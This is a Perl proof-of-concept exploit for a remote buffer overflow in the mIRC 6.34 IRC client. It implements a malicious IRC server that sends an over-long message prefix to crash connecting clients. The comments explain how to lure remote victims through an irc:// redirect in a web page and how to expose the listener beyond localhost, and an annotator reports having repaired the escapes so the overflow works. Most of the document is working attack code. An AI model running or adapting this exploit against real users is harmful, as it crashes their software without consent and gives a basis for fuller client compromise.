
# Title : mIRC 6.34 Remote Buffer Overflow PoC
# Published : 2008-10-02
# Author : securfrog


##################################################################################################
# mIRC 6.34 Remote Buffer Overflow PoC
#
# This script is a malicious IRC *server*: once mIRC connects, it sends a PRIVMSG whose source
# prefix is 313 'A' bytes followed by two chosen bytes. The over-long prefix overflows a buffer
# in the client; the author reports that the two trailing bytes end up controlling two bytes of
# EDI and EDX. As written the PoC only crashes mIRC - it carries no payload.
#
# To trigger it remotely, embed document.location.href="irc://server.com/..." in an HTML page so
# the victim's browser hands the irc:// URL to mIRC, which then connects to this server. Note
# that the listener below binds to 'localhost' only; point LocalAddr at a reachable interface
# for the remote case.
#
use IO::Socket;

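# Run one round of the malicious IRC server: listen, accept a single mIRC
# client, send it a fake welcome and then the over-long PRIVMSG prefix that
# overflows the client.  Returns after the client has been served; the
# caller loops to serve the next one.
#
# Optional arguments (both default to the original hard-coded values):
#   $addr - interface to bind ('localhost' only reaches local clients;
#           use a routable address for the irc:// redirect trick)
#   $port - TCP port to listen on (6667)
#
# Dies with the OS error if the listener cannot be created or accept() fails.
#
# Fixes relative to the archived listing: IRC lines end in CRLF and the two
# trailing bytes are 0x43 0x43 - both escapes had lost their backslashes
# ("rn", "x43x43"), so the archived copy sent literal text and never built
# the intended prefix.  ReuseAddr lets the next round re-bind immediately,
# both sockets are closed explicitly instead of being left to scope exit,
# and the padding no longer lives in the sort() global $a.
sub sock {
    my ($addr, $port) = @_;
    $addr = 'localhost' unless defined $addr;
    $port = 6667        unless defined $port;

    my $listener = IO::Socket::INET->new(
        Listen    => 1,
        LocalAddr => $addr,
        LocalPort => $port,
        Proto     => 'tcp',
        ReuseAddr => 1,
    ) or die "cannot listen on $addr:$port: $!";

    print " [+]IRC Server started on port $port \r\n";

    my $client = $listener->accept() or die "accept failed: $!";

    my $padding  = 'A' x 313;      # fills the buffer up to the controlled bytes
    my $twobytes = "\x43\x43";     # the two bytes the author reports reaching EDI/EDX

    print " [+]Sending pickles\r\n";

    # Fake RPL_WELCOME (001) so the client treats registration as complete.
    print {$client} ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n";
    sleep(1);
    # The over-long source prefix (':' followed by 315 bytes) is what triggers the overflow.
    print {$client} ':' . $padding . $twobytes . " PRIVMSG  yow : /FINGER yow.\r\n";

    close $client;
    close $listener;
    return;
}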
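# Serve one victim at a time: each pass builds a fresh listener, waits for a
# client, fires the overflow, reports, and loops to catch the next one.
# Runs until killed (Ctrl-C).
# Fix relative to the archived listing: the line endings were literal "rn"
# because the backslashes were stripped; restored to "\r\n".
while (1) {
    sock();
    print " [+]Mirc should be down now, another little friend comming ?\r\n [+]Server Restarting\r\n";
}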
